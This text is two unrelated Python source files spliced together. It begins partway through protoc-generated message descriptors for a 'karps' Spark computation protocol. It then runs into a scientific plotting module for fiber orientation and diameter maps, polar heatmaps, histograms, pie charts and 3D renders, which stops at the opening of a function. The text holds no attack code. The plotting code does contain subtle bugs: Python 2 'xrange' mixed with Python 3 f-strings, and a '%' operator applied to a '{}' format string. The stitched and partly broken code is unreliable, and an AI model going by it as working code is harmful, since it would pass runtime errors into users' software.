_descriptor.Descriptor( name='SessionId', full_name='karps.core.SessionId', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ 
_descriptor.FieldDescriptor( name='id', full_name='karps.core.SessionId.id', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=1082, serialized_end=1105, ) _COMPUTATIONRESULT.fields_by_name['local_path'].message_type = karps_dot_proto_dot_graph__pb2._PATH _COMPUTATIONRESULT.fields_by_name['status'].enum_type = _RESULTSTATUS _COMPUTATIONRESULT.fields_by_name['final_result'].message_type = karps_dot_proto_dot_row__pb2._CELLWITHTYPE _COMPUTATIONRESULT.fields_by_name['spark_stats'].message_type = _SPARKSTATS _COMPUTATIONRESULT.fields_by_name['dependencies'].message_type = karps_dot_proto_dot_graph__pb2._PATH _BATCHCOMPUTATIONRESULT.fields_by_name['target_path'].message_type = karps_dot_proto_dot_graph__pb2._PATH _BATCHCOMPUTATIONRESULT.fields_by_name['results'].message_type = _COMPUTATIONRESULT _POINTERPATH.fields_by_name['computation'].message_type = _COMPUTATIONID _POINTERPATH.fields_by_name['local_path'].message_type = karps_dot_proto_dot_graph__pb2._PATH _SPARKSTATS.fields_by_name['rdd_info'].message_type = _RDDINFO _SPARKSTATS.fields_by_name['parsed'].message_type = _SQLTREEINFO _SPARKSTATS.fields_by_name['analyzed'].message_type = _SQLTREEINFO _SPARKSTATS.fields_by_name['optimized'].message_type = _SQLTREEINFO _SPARKSTATS.fields_by_name['physical'].message_type = _SQLTREEINFO _RDDINFO.fields_by_name['proto'].message_type = tensorflow_dot_core_dot_framework_dot_node__def__pb2._NODEDEF _SQLTREEINFO.fields_by_name['proto'].message_type = tensorflow_dot_core_dot_framework_dot_node__def__pb2._NODEDEF DESCRIPTOR.message_types_by_name['ComputationResult'] = _COMPUTATIONRESULT DESCRIPTOR.message_types_by_name['BatchComputationResult'] = _BATCHCOMPUTATIONRESULT DESCRIPTOR.message_types_by_name['PointerPath'] = _POINTERPATH DESCRIPTOR.message_types_by_name['SparkStats'] = _SPARKSTATS DESCRIPTOR.message_types_by_name['RDDInfo'] = _RDDINFO DESCRIPTOR.message_types_by_name['SQLTreeInfo'] = _SQLTREEINFO DESCRIPTOR.message_types_by_name['ComputationId'] = _COMPUTATIONID DESCRIPTOR.message_types_by_name['SessionId'] = _SESSIONID DESCRIPTOR.enum_types_by_name['ResultStatus'] = _RESULTSTATUS _sym_db.RegisterFileDescriptor(DESCRIPTOR) ComputationResult = _reflection.GeneratedProtocolMessageType('ComputationResult', (_message.Message,), dict( DESCRIPTOR = _COMPUTATIONRESULT, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.ComputationResult) )) _sym_db.RegisterMessage(ComputationResult) BatchComputationResult = _reflection.GeneratedProtocolMessageType('BatchComputationResult', (_message.Message,), dict( DESCRIPTOR = _BATCHCOMPUTATIONRESULT, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.BatchComputationResult) )) _sym_db.RegisterMessage(BatchComputationResult) PointerPath = _reflection.GeneratedProtocolMessageType('PointerPath', (_message.Message,), dict( DESCRIPTOR = _POINTERPATH, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.PointerPath) )) _sym_db.RegisterMessage(PointerPath) SparkStats = _reflection.GeneratedProtocolMessageType('SparkStats', (_message.Message,), dict( DESCRIPTOR = _SPARKSTATS, __module__ = 'karps.proto.computation_pb2' # 
@@protoc_insertion_point(class_scope:karps.core.SparkStats) )) _sym_db.RegisterMessage(SparkStats) RDDInfo = _reflection.GeneratedProtocolMessageType('RDDInfo', (_message.Message,), dict( DESCRIPTOR = _RDDINFO, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.RDDInfo) )) _sym_db.RegisterMessage(RDDInfo) SQLTreeInfo = _reflection.GeneratedProtocolMessageType('SQLTreeInfo', (_message.Message,), dict( DESCRIPTOR = _SQLTREEINFO, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.SQLTreeInfo) )) _sym_db.RegisterMessage(SQLTreeInfo) ComputationId = _reflection.GeneratedProtocolMessageType('ComputationId', (_message.Message,), dict( DESCRIPTOR = _COMPUTATIONID, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.ComputationId) )) _sym_db.RegisterMessage(ComputationId) SessionId = _reflection.GeneratedProtocolMessageType('SessionId', (_message.Message,), dict( DESCRIPTOR = _SESSIONID, __module__ = 'karps.proto.computation_pb2' # @@protoc_insertion_point(class_scope:karps.core.SessionId) )) _sym_db.RegisterMessage(SessionId) try: # THESE ELEMENTS WILL BE DEPRECATED. # Please use the generated *_pb2_grpc.py files instead. import grpc from grpc.beta import implementations as beta_implementations from grpc.beta import interfaces as beta_interfaces from grpc.framework.common import cardinality from grpc.framework.interfaces.face import utilities as face_utilities except ImportError: pass # @@protoc_insertion_point(module_scope)
import os import math import numpy as np import matplotlib as mpl import matplotlib.pyplot as plt import matplotlib.ticker as ticker import matplotlib.colors as colors import mpl_toolkits.axisartist.floating_axes as floating_axes from skimage import io from matplotlib import cm from skimage import filters from skimage import morphology from quanfima.utils import geo2rgb from quanfima import visvis_available from matplotlib.transforms import Affine2D from matplotlib.projections import PolarAxes from scipy import ndimage as ndi, interpolate from mpl_toolkits.axes_grid1 import make_axes_locatable from mpl_toolkits.axisartist.grid_finder import DictFormatter, FixedLocator from mpl_toolkits.axisartist.floating_axes import GridHelperCurveLinear if visvis_available: import visvis as vv def plot_orientation_map(orient_map, fiber_skel, radius_structure_elem=1, figsize=(12, 12), cmap='hsv', dpi=200, min_label='0', max_label='180', name=None, output_dir=None): """Plots the orientation map with the color wheel. Plots the orientation map from the provided angles `orient_map` and skeleton `fiber_skel` of size `figsize` using the colormap `cmap` and writes as a png file with DPI of `dpi` to the folder specified by `output_dir`. Parameters ---------- orient_map : ndarray 2D array of orientation at every point of the skeleton. fiber_skel : ndarray The binary skeleton extracted from the binary data. radius_structure_elem : integer Indicates the size of the structure element of the dilation process to thicken the skeleton. figsize : tuple of integers Indicates the size of the output figure. cmap : str Indicates the name of a colormap used to map angles to colors. dpi : integer Indicates the DPI of the output image. min_label : str Indicates the label of minimum degree. max_label : str Indicates the label of minimum degree. name : str Indicates the name of the output png file. output_dir : str Indicates the path to the output folder where the image will be stored. 
""" disk = morphology.disk(radius_structure_elem) orient_map = ndi.grey_dilation(orient_map, structure=disk).astype(np.float32) fiber_skel = ndi.binary_dilation(fiber_skel, structure=disk).astype(np.float32) fig = plt.figure(figsize=figsize) masked_orient_map = np.ma.masked_where(fiber_skel == 0, orient_map) quant_steps = 2056 cmap_obj = cm.get_cmap(cmap, quant_steps) cmap_obj.set_bad(color='black') omap_ax = fig.add_axes([0.0, 0.0, 1.0, 1.0]) omap_ax.set_axis_off() omap_ax.imshow(masked_orient_map, cmap=cmap_obj, interpolation=None) display_axes = fig.add_axes([0.780, -0.076, 0.2, 0.2], projection='polar') display_axes._direction = np.pi norm = mpl.colors.Normalize(0.0, np.pi) cb = mpl.colorbar.ColorbarBase(display_axes, cmap=cmap_obj, norm=norm, orientation='horizontal') display_axes.text(0.09, 0.56, min_label, color='white', fontsize=20, weight='bold', horizontalalignment='center', verticalalignment='center', transform=display_axes.transAxes) display_axes.text(0.85, 0.56, max_label, color='white', fontsize=20, weight='bold', horizontalalignment='center', verticalalignment='center', transform=display_axes.transAxes) cb.outline.set_visible(False) display_axes.set_axis_off() if (output_dir is not None) and (name is not None): if not os.path.exists(output_dir): os.makedirs(output_dir) fig.savefig(os.path.join(output_dir, f'{name}_orientation_map.png'), transparent=False, bbox_inches='tight', pad_inches=0.1, dpi=dpi) plt.show() def plot_diameter_map(thickness_map, fiber_skel, radius_structure_elem=1, figsize=(15, 15), cmap='hsv', tmin=None, tmax=None, dpi=200, labelsize=20, label='Diameter, [pixels]', name=None, output_dir=None): """Plots the diameter map with the colorbar. Plots the diameter map from the provided diameters `thickness_map` and skeleton `fiber_skel` of size `figsize` using the colormap `cmap` and the limits of the colorbar specified by `tmin` and `tmax`, and writes as a png file with DPI of `dpi` to the folder specified by `output_dir`. Parameters ---------- thickness_map : ndarray 2D array of diameter at every point of the skeleton. fiber_skel : ndarray The binary skeleton extracted from the binary data. radius_structure_elem : integer Indicates the size of the structure element of the dilation process to thicken the skeleton. figsize : tuple of integers Indicates the size of the output figure. cmap : str Indicates the name of a colormap used to map angles to colors. tmin : float Indicates the minimum value of the colorbar. tmax : float Indicates the maximum value of the colorbar. dpi : integer Indicates the DPI of the output image. labelsize : integer Indicates the fontsize of the label of the colorbar. label : str Indicates the label of the colorbar. name : str Indicates the name of the output png file. output_dir : str Indicates the path to the output folder where the image will be stored. 
""" disk = morphology.disk(radius_structure_elem) thickness_map = ndi.grey_dilation(thickness_map, structure=disk).astype(np.float32) fiber_skel = ndi.binary_dilation(fiber_skel, structure=disk).astype(np.float32) masked_thickness_map = np.ma.masked_where(fiber_skel == 0, thickness_map) cmap_obj = cm.get_cmap(cmap) cmap_obj.set_bad(color='black') fig = plt.figure(figsize=figsize) ax = plt.subplot(111) ax.set_axis_off() im = ax.imshow(masked_thickness_map, cmap=cmap_obj, vmin=tmin, vmax=tmax) divider = make_axes_locatable(ax) cax = divider.append_axes('right', size="2.5%", pad=0.05) cbar = plt.colorbar(im, cax=cax) cbar.ax.tick_params(labelsize=labelsize) cbar.set_label(label, fontsize=labelsize) if (output_dir is not None) and (name is not None): if not os.path.exists(output_dir): os.makedirs(output_dir) fig.savefig(os.path.join(output_dir, f'{name}_diameter_map.png'), transparent=False, bbox_inches='tight', pad_inches=0.1, dpi=dpi) plt.show() def gather_polar_errors(datasets_path, estimation_path, azth_rng=np.arange(-90, 91, step=3), lat_rng=np.arange(0, 91, step=3)): """Computes the absolute angular error in ranges between estimated datasets. Calculates the absolute angular error in ranges `azth_rng` and `lat_rng` between estimated orientation datasets localed at paths `datasets_path` and `estimation_path`. Parameters ---------- datasets_path : str Indicates the path to the reference / estimated dataset. estimation_path : str Indicates the path to the estimated / reference dataset. azth_rng : array Indicates the ranges of azimuth angles where the error is accumulated. lat_rng : array Indicates the ranges of latitude or elevation angles where the error is accumulated. Returns ------- array : 2D array The 2D array of accumulated errors within the combinations of the specified angular ranges. """ reference_dataset = np.load(datasets_path).item() estimated_dataset = np.load(estimation_path).item() idxs = estimated_dataset['indices'] print(reference_dataset.keys()) print(estimated_dataset.keys()) ref_azth, ref_lat = reference_dataset['azth'][idxs], reference_dataset['lat'][idxs] res_azth, res_lat = estimated_dataset['azth'][idxs], estimated_dataset['lat'][idxs] abs_err_azth, abs_err_lat = np.abs(ref_azth - res_azth), np.abs(ref_lat - res_lat) out = _angle_err2mean_abs_err(abs_err_azth, abs_err_lat, ref_azth, ref_lat, azth_rng=azth_rng, lat_rng=lat_rng) return out def _angle_err2mean_abs_err(azth_err, lat_err, azth_ref, lat_ref, azth_rng=np.arange(-90, 91, step=5), lat_rng=np.arange(0, 91, step=5)): """Computes the absolute angular error in ranges between estimated datasets. Parameters ---------- azth_err : 3D array Indicates the error of azimuth components. lat_err : 3D array Indicates the error of latitude / elevation components. azth_ref : 3D array Indicates the reference dataset of estimated azimuth component. lat_ref : 3D array Indicates the reference dataset of estimated latitude or elevation component. azth_rng : array Indicates the ranges of azimuth angles where the error is accumulated. lat_rng : array Indicates the ranges of latitude and elevation angles where the error is accumulated. Returns ------- array : 2D array The 2D array of accumulated errors within the combinations of the specified angular ranges. 
""" out = np.zeros((len(azth_rng) - 1, len(lat_rng) - 1), dtype=np.float32) for i in xrange(len(azth_rng) - 1): for j in xrange(len(lat_rng) - 1): rng_azth = (np.deg2rad(azth_rng[i]), np.deg2rad(azth_rng[i+1])) rng_lat = (np.deg2rad(lat_rng[j]), np.deg2rad(lat_rng[j+1])) idxs_azth = np.where((azth_ref >= rng_azth[0]) & (azth_ref < rng_azth[1])) idxs_lat = np.where((lat_ref >= rng_lat[0]) & (lat_ref < rng_lat[1])) idxs = np.intersect1d(idxs_azth, idxs_lat) if len(idxs): mu_azth, mu_lat = np.rad2deg(np.mean(azth_err[idxs])), \ np.rad2deg(np.mean(lat_err[idxs])) out[i, j] = mu_azth + mu_lat else: out[i, j] = 0.0 return out def plot_polar_heatmap(data, name, interp_factor=5., color_limits=False, hide_colorbar=False, vmin=None, vmax=None, log_scale=True, dpi=200, output_dir=None): """Plots the polar heatmap describing azimuth and latitude / elevation components. Plots the polar heatmap where each cell of the heatmap corresponds to the specific element of the array provided by `gather_polar_errors` function. Parameters ---------- data : 2D array Indicates the array containing the sum of angular errors within the specified angular ranges. It is usually provided by `gather_polar_errors` function. name : str Indicates the name of the output png file. interp_factor : float Indicates the interpolation factor of the heatmap. color_limits : boolean Specifies if the determined intensity limits should be returned. hide_colorbar : boolean Specifies if the colorbar should be hidden. vmin : float Indicates the minimum value of the colorbar. vmax : float Indicates the maximum value of the colorbar. log_scale : float Specifies if the heatmap sould be in the logarithmic scale. dpi : integer Indicates the DPI of the output image. output_dir : str Indicates the path to the output folder where the image will be stored. """ th0, th1 = 0., 180. r0, r1 = 0, 90 thlabel, rlabel = 'Azimuth', 'Elevation' tr_scale = Affine2D().scale(np.pi/180., 1.) 
tr = tr_scale + PolarAxes.PolarTransform() lat_ticks = [(.0*90., '0$^{\circ}$'), (.33*90., '30$^{\circ}$'), (.66*90., '60$^{\circ}$'), (1.*90., '90$^{\circ}$')] r_grid_locator = FixedLocator([v for v, s in lat_ticks]) r_grid_formatter = DictFormatter(dict(lat_ticks)) angle_ticks = [(0*180., '90$^{\circ}$'), (.25*180., '45$^{\circ}$'), (.5*180., '0$^{\circ}$'), (.75*180., '-45$^{\circ}$'), (1.*180., '-90$^{\circ}$')] theta_grid_locator = FixedLocator([v for v, s in angle_ticks]) theta_tick_formatter = DictFormatter(dict(angle_ticks)) grid_helper = GridHelperCurveLinear(tr, extremes=(th0, th1, r0, r1), grid_locator1=theta_grid_locator, grid_locator2=r_grid_locator, tick_formatter1=theta_tick_formatter, tick_formatter2=r_grid_formatter) fig = plt.figure() ax = floating_axes.FloatingSubplot(fig, 111, grid_helper=grid_helper) fig.add_subplot(ax) ax.set_facecolor('white') ax.axis["bottom"].set_visible(False) ax.axis["top"].toggle(ticklabels=True, label=True) ax.axis["top"].set_axis_direction("bottom") ax.axis["top"].major_ticklabels.set_axis_direction("top") ax.axis["top"].label.set_axis_direction("top") ax.axis["left"].set_axis_direction("bottom") ax.axis["right"].set_axis_direction("top") ax.axis["top"].label.set_text(thlabel) ax.axis["left"].label.set_text(rlabel) aux_ax = ax.get_aux_axes(tr) aux_ax.patch = ax.patch ax.patch.zorder = 0.9 rad = np.linspace(0, 90, data.shape[1]) azm = np.linspace(0, 180, data.shape[0]) f = interpolate.interp2d(rad, azm, data, kind='linear', bounds_error=True, fill_value=0) new_rad = np.linspace(0, 90, 180*interp_factor) new_azm = np.linspace(0, 180, 360*interp_factor) new_data_angle_dist = f(new_rad, new_azm) new_r, new_th = np.meshgrid(new_rad, new_azm) new_data_angle_dist += 1. if log_scale: data_mesh = aux_ax.pcolormesh(new_th, new_r, new_data_angle_dist, cmap='jet', norm=colors.LogNorm(vmin=1. if vmin is None else vmin, vmax=new_data_angle_dist.max() if vmax is None else vmax)) else: data_mesh = aux_ax.pcolormesh(new_th, new_r, new_data_angle_dist, cmap='jet', vmin=vmin, vmax=vmax) cbar = plt.colorbar(data_mesh, orientation='vertical', shrink=.88, pad=.1, aspect=15) cbar.ax.set_ylabel('Absolute error, [deg.]') if hide_colorbar: cbar.remove() ax.grid(False) plt.show() if output_dir is not None: if not os.path.exists(output_dir): os.makedirs(output_dir) fig.savefig(os.path.join(output_dir, f'{name}_chart.png'), transparent=False, bbox_inches='tight', pad_inches=0.1, dpi=dpi) if color_limits: return 1., new_data_angle_dist.max() def plot_histogram_fig(data, num_bins, xticks, color, splot_index=111, output_dir=None, xlim=(None, None), ylim=(None, None), name=None, in_percent=False, bar_width=0.8, ticks_pad=7, xticks_fontsize=22, yticks_fontsize=22, xlabel=None, ylabel=None, labels_fontsize=20, grid_alpha=0.3, title_fontsize=22, exp_fontsize=15, type=None, figsize=(12, 8), dpi=200): """Plots the histogram from a given data. Parameters ---------- data : 1D array Indicates the array containing the values. num_bins : integer Indicates the number of histogram bins. xticks : array Indicates the array of ticks of the X-axis. color : str Indicates the color of the histogram. Returns ------- tuple : tuple of Figure and Axis objects. 
""" fig = plt.figure(figsize=figsize) ax = fig.add_subplot(splot_index) weights = np.ones_like(data)/float(len(data)) n, bins, patches = ax.hist(data, num_bins, color=color, rwidth=bar_width, weights=weights) ax.tick_params(axis='x', labelsize=xticks_fontsize, colors='#000000', which='both', direction='out', length=6, width=2, pad=ticks_pad) ax.tick_params(axis='x', labelsize=xticks_fontsize, colors='#000000', which='minor', direction='out', length=4, width=2, pad=ticks_pad) ax.tick_params(axis='y', labelsize=yticks_fontsize, colors='#000000', which='major', direction='out', length=6, width=2, pad=ticks_pad) ax.tick_params(axis='y', labelsize=xticks_fontsize, colors='#000000', which='minor', direction='out', length=4, width=2, pad=ticks_pad) ax.xaxis.set_minor_locator(ticker.MultipleLocator(5)) ax.yaxis.set_minor_locator(ticker.MultipleLocator(5)) plt.xticks(xticks, xticks) ax.xaxis.offsetText.set_fontsize(exp_fontsize) ax.yaxis.offsetText.set_fontsize(exp_fontsize) ax.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2), fontsize=yticks_fontsize) ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins=6, min_n_ticks=6)) ax.xaxis.grid(False) ax.yaxis.grid(False) ax.set_ylabel(ylabel, labelpad=2, fontsize=labels_fontsize, color='black') ax.set_xlabel(xlabel, labelpad=2, fontsize=labels_fontsize, color='black') ax.set_ylim(ylim) ax.set_xlim(xlim) if in_percent: vals = ax.get_yticks() ax.set_yticklabels(['{:3.0f}'.format(x*100) for x in vals]) ax.set_axisbelow(True) if (output_dir is not None) and (name is not None): if not os.path.exists(output_dir): os.makedirs(output_dir) plt.tight_layout() fig.savefig(os.path.join(output_dir, f'{name}_chart.png'), transparent=False, bbox_inches='tight', pad_inches=0.1, dpi=dpi) return fig, ax def create_pie_chart(data, rngs, colors=['#244268', '#426084', '#67809F', '#95A9C1', '#C6D2E0'], unit_scale=1.0, measure_quantity='m^3', figsize=(33, 15), legend_loc=(0.383, -0.25), zebra_color=(False, 3), legend_fontsize=50, chart_fontsize=60, dpi=72, name=None, output_dir=None): """Plots the piechart of from a given data. Parameters ---------- data : 1D array Indicates the array containing the values. rngs : tuple of tuples Indicates the ranges of the piechart. colors : array Indicates the color for the region of the piechart corresponding to the specific range. unit_scale : float Indicates the scale factor of the data values. measure_quantity : str Indicates the name of measure of the values. figsize : tuple of integers Indicates the size of the output figure. legend_loc : tuple Indicates the position of the legend of the figure. zebra_color : tuple Allows to change the text color of the region to white from the first to the speficied index of the region (True, reg_index). legend_fontsize : integer Indicates the fontsize of the legend. chart_fontsize : integer Indicates the fontsize of the figure. dpi : integer Indicates the DPI of the output image. name : str Indicates the name of the output png file. output_dir : str Indicates the path to the output folder where the image will be stored. 
""" def number(val): if val < 1000: return '%d' % val sv = str(val) return '$\mathregular{10^{%d}}$' % (len(sv)-2) if val % 10 == 0 else '%0.0e' % val def get_title(v1, v2, measure_quantity): ftm = '%s $\minus$ %s %s' return ftm % (number(v1), number(v2), measure_quantity) data_ranges = [] df = data * unit_scale for rng in rngs: rng_min, rng_max = rng[0], rng[1] data_rng = df[(df > rng_min) & (df < rng_max)] data_ranges.append(data_rng) num_elem = [len(p) for p in data_ranges] se = sum(num_elem) print(f'Num of particles: {se}') proc_particles = [n/float(se) * 100.0 for n in num_elem] for size, rng in zip(num_elem, rngs): print('{}-{}: {}'%(rng[0], rng[1], size)) titles = [get_title(minv, maxv, measure_quantity) for minv, maxv in rngs] textprops = {'fontsize': chart_fontsize, 'weight': 'normal', 'family': 'sans-serif'} pie_width = 0.5 fig, ax = plt.subplots(figsize=figsize) ax.axis('equal') patches, texts, autotexts = ax.pie(proc_particles, textprops=textprops, colors=colors, autopct='%1.1f%%', radius=1, pctdistance=1-pie_width/2) if (zebra_color is not None) and (zebra_color[0]): for tt in autotexts[:zebra_color[1]]: tt.set_color('white') plt.setp(patches, width=pie_width, edgecolor='white') plt.legend(patches, titles, loc=legend_loc, fontsize=legend_fontsize) _d, _offset, _di = [1, -1], [0.45, 0.45], 0 for t, p in zip(autotexts, proc_particles): if p < 2.0: pos = list(t.get_position()) pos[0] = pos[0] + _d[_di] * _offset[_di] t.set_position(pos) _di += 1 if (output_dir is not None) and (name is not None): if not os.path.exists(output_dir): os.makedirs(output_dir) plt.tight_layout() fig.savefig(os.path.join(output_dir, f'{name}_chart.png'), bbox_inches='tight', transparent=True, pad_inches=0.1, dpi=dpi) def _bbox_3D(img): """Crops the non-zero part of a volume """ r = np.any(img, axis=(1, 2)) c = np.any(img, axis=(0, 2)) z = np.any(img, axis=(0, 1)) rmin, rmax = np.where(r)[0][[0, -1]] cmin, cmax = np.where(c)[0][[0, -1]] zmin, zmax = np.where(z)[0][[0, -1]] return rmin, rmax, cmin, cmax, zmin, zmax def plot_3d_orientation_map(name, lat_data, azth_data, radius_structure_elem=1, output_dir=None, width=512, height=512, camera_azth=44.5, camera_elev=35.8, camera_roll=0.0, camera_fov=35.0, camera_zoom=0.0035, camera_loc=(67.0, 81.6, 45.2), xlabel='', ylabel='', zlabel='', axis_color='w', background_color='k'): """Renders orientation data in 3D with RGB angular color-coding. Parameters ---------- name : str Indicates the name of the output png file. lat_data : 3D array Indicates the 3D array containing latitude / elevation angle at every point of the skeleton in radians. azth_data : 3D array Indicates the 3D array containing azimuth angle at every point of the skeleton in radians. radius_structure_elem : integer Indicates the size of the structure element of the dilation process to thicken the skeleton. output_dir : str Indicates the path to the output folder where the image will be stored. width : int Indicates the width of the visualization window. height : int Indicates the width of the visualization window. camera_azth : float Indicates the azimuth angle of the camera. camera_elev : float Indicates the latitude / elevation angle of the camera. camera_roll : float Indicates the roll angle of the camera. camera_fov : float Indicates the field of view of the camera. camera_zoom : float Indicates the zoom level of the camera. camera_loc : tuple Indicates the camera location. xlabel : str Indicates the label along the x-axis. ylabel : str Indicates the label along the y-axis. 
zlabel : str Indicates the label along the z-axis. axis_color : str Indicates the color of axes. background_color : str Indicates the background color of the figure. """ if not visvis_available: print('The visvis package is not found. The visualization cannot be done.') return rmin, rmax, cmin, cmax, zmin, zmax = _bbox_3D(azth_data) azth, lat = azth_data[rmin:rmax, cmin:cmax, zmin:zmax], \ np.abs(lat_data[rmin:rmax, cmin:cmax, zmin:zmax]) skel = azth.copy().astype(np.float32) skel[skel.nonzero()] = 1. azth = ndi.grey_dilation(azth, structure=morphology.ball(radius_structure_elem)) lat = ndi.grey_dilation(lat, structure=morphology.ball(radius_structure_elem)) skel = ndi.binary_dilation(skel, structure=morphology.ball(radius_structure_elem)) Z, Y, X = skel.nonzero() vol_orient = np.zeros(skel.shape + (3,), dtype=np.float32) print(vol_orient.size, vol_orient[skel.nonzero()].size) for z, y, x in zip(Z, Y, X): vol_orient[z, y, x] = geo2rgb(lat[z, y, x], azth[z, y, x]) app = vv.use() fig = vv.figure() fig._currentAxes = None fig.relativeFontSize = 2. fig.position.w = width fig.position.h = height t = vv.volshow(vol_orient[:, :, :], renderStyle='iso') t.isoThreshold = 0.5 a = vv.gca() a.camera.azimuth = camera_azth a.camera.elevation = camera_elev a.camera.roll = camera_roll a.camera.fov = camera_fov a.camera.zoom = camera_zoom a.camera.loc = camera_loc a.bgcolor = background_color a.axis.axisColor = axis_color a.axis.xLabel = xlabel a.axis.yLabel = ylabel a.axis.zLabel = zlabel # def mouseUp(event): # print 'mouseUp!!' # a = vv.gca() # print a.camera.GetViewParams() # # a.eventMouseUp.Bind(mouseUp) # fig.eventMouseUp.Bind(mouseUp) # # a.Draw() # fig.DrawNow() if output_dir is not None: if not os.path.exists(output_dir): os.makedirs(output_dir) vv.screenshot(os.path.join(output_dir, f'{name}_3d_orientation.png'), sf=1, bg=background_color) app.Run() def plot_3d_diameter_map(name, data, unit_scale=1.0, measure_quantity='vox', radius_structure_elem=1, output_dir=None, width=512, height=512, camera_azth=44.5, camera_elev=35.8, camera_roll=0.0, camera_fov=35.0, camera_zoom=0.0035, camera_loc=(67.0, 81.6, 45.2), xlabel='', ylabel='', zlabel='', axis_color='w', background_color='k', cb_x_offset=10): """Renders orientation data in 3D with RGB angular color-coding. Parameters ---------- name : str Indicates the name of the output png file. data : 3D array Indicates the 3D array containing diameter at every point of the skeleton. unit_scale : float Indicates the scale factor of the data values. measure_quantity : str Indicates the name of measure of the values. radius_structure_elem : integer Indicates the size of the structure element of the dilation process to thicken the skeleton. output_dir : str Indicates the path to the output folder where the image will be stored. camera_azth : float Indicates the azimuth angle of the camera. width : int Indicates the width of the visualization window. height : int Indicates the width of the visualization window. camera_elev : float Indicates the latitude / elevation angle of the camera. camera_roll : float Indicates the roll angle of the camera. camera_fov : float Indicates the field of view of the camera. camera_zoom : float Indicates the zoom level of the camera. camera_loc : tuple Indicates the camera location. xlabel : str Indicates the label along the x-axis. ylabel : str Indicates the label along the y-axis. zlabel : str Indicates the label along the z-axis. axis_color : str Indicates the color of axes. 
background_color : str Indicates the background color of the figure. cb_x_offset : int Indicates the offset of the colorbar from the right window side. """ if not visvis_available: print('The visvis package is not found. The visualization cannot be done.') return rmin, rmax, cmin, cmax, zmin, zmax = _bbox_3D(data) dmtr = data[rmin:rmax, cmin:cmax, zmin:zmax] * unit_scale skel = np.zeros_like(dmtr, dtype=np.uint8) skel[dmtr.nonzero()] = 1 dmtr = ndi.grey_dilation(dmtr, structure=morphology.ball(radius_structure_elem)) skel = ndi.binary_dilation(skel, structure=morphology.ball(radius_structure_elem)).astype(np.float32) skel[skel.nonzero()] = 1. dmtr = dmtr * skel app = vv.use() fig = vv.figure() fig._currentAxes = None fig.relativeFontSize = 2. fig.position.w = width fig.position.h = height t = vv.volshow(dmtr[:, :, :], renderStyle='iso') t.isoThreshold = 0.5 t.colormap = vv.CM_JET a = vv.gca() a.camera.azimuth = camera_azth a.camera.elevation = camera_elev a.camera.roll = camera_roll a.camera.fov = camera_fov a.camera.zoom = camera_zoom a.camera.loc = camera_loc a.bgcolor = background_color a.axis.axisColor = axis_color a.axis.xLabel = xlabel a.axis.yLabel = ylabel a.axis.zLabel = zlabel cb = vv.colorbar() cb.SetLabel(f'Diameter, [{measure_quantity}]') cb._label.position.x += cb_x_offset if output_dir is not None: if not os.path.exists(output_dir): os.makedirs(output_dir) vv.screenshot(os.path.join(output_dir, f'{name}_3d_diameter.png'), sf=1, bg='w') app.Run() def plot_color_wheel(name, output_dir=None, dpi=500, xlabel='Elevation', ylabel='Azimuth', fontsize=10, num_xticks=4, yticks=(-90, 90)): """Plots the color wheel for visualizations of 3D orintation. Parameters ---------- name : str Indicates the name of the output png file. output_dir : str Indicates the path to the output folder where the image will be stored. dpi : integer Indicates the DPI of the output image. xlabel : str Indicates the text along the x-axis. ylabel : str Indicates the text along the y-axis. fontsize : int Indicates the font size of labels along axes. num_xticks : int Indicates the number of ticks along axes. yticks : tuple Indicates the range of minimum and maximum values along the y-axis. """ azth, lat = np.linspace(0., 1., num=180), np.linspace(0., 1., num=90) rgb_arr = np.zeros((len(azth), len(lat), 3)) for i in xrange(len(azth)): for j in xrange(len(lat)): rgb_arr[i, j, :] = colors.hsv_to_rgb([azth[i], lat[j], 1.0]) fig, ax = plt.subplots(figsize=(2, 2)) ax.set_facecolor('red') ax.set_xlim([0, 90]) ax.set_ylim([0, 181]) ax.set_yticks(np.linspace(0, 180, num=7).astype(np.int32)) ax.set_yticklabels(np.linspace(yticks[0], yticks[1], num=7).astype(np.int32)) ax.set_xlabel(xlabel, fontsize=fontsize, labelpad=0, color='w') ax.set_ylabel(ylabel, fontsize=fontsize, labelpad=0, color='w') xmajorlocator = ticker.LinearLocator(num_xticks) ax.xaxis.set_major_locator(xmajorlocator) ax.tick_params(direction='out', length=2, width=0, labelsize=fontsize, pad=0, colors='w') ax.imshow(rgb_arr) if output_dir is not None: if not os.path.exists(output_dir): os.makedirs(output_dir) fig.savefig(os.path.join(output_dir, f'{name}_color_bar.png'), transparent=True, bbox_inches='tight', pad_inches=0.1, dpi=dpi) plt.show() def plot_fourier_orientation(data, orient_blocks, block_shape, figsize=(12,12), cmap='gray', line_length=20, line_width=2.5, line_color='red', line_style='-', name=None, output_dir=None, dpi=200): """Plots the orientation map in a block-wise manner. 
    Plots the orientation vector over the image `data` at the center of each
    block of the subdivided image. The orientation at every block
    `orient_blocks` and its size `block_shape` are specified by the orientation
    estimation method. The result can be stored as a png file with DPI of
    `dpi` in the folder specified by `output_dir`.

    Parameters
    ----------
    data : ndarray
        An image on top of which the orientation will be plotted.

    orient_blocks : ndarray
        2D array of orientation at every block of the subdivided image.

    block_shape : tuple
        Indicates the block size within which the orientation is calculated.

    figsize : tuple of integers
        Indicates the size of the output figure.

    cmap : str
        Indicates the name of a colormap used for image.

    line_length : integer
        Indicates the length of the orientation vector at each block.

    line_width : float
        Indicates the line width of the orientation vector at each block.

    line_color : str
        Indicates the line color of the orientation vector at each block.

    line_style : str
        Indicates the line style of the orientation vector at each block.

    name : str
        Indicates the name of the output png file.

    output_dir : str
        Indicates the path to the output folder where the image will be stored.

    dpi : integer
        Indicates the DPI of the output image.
    """
    fig, ax = plt.subplots(figsize=figsize)
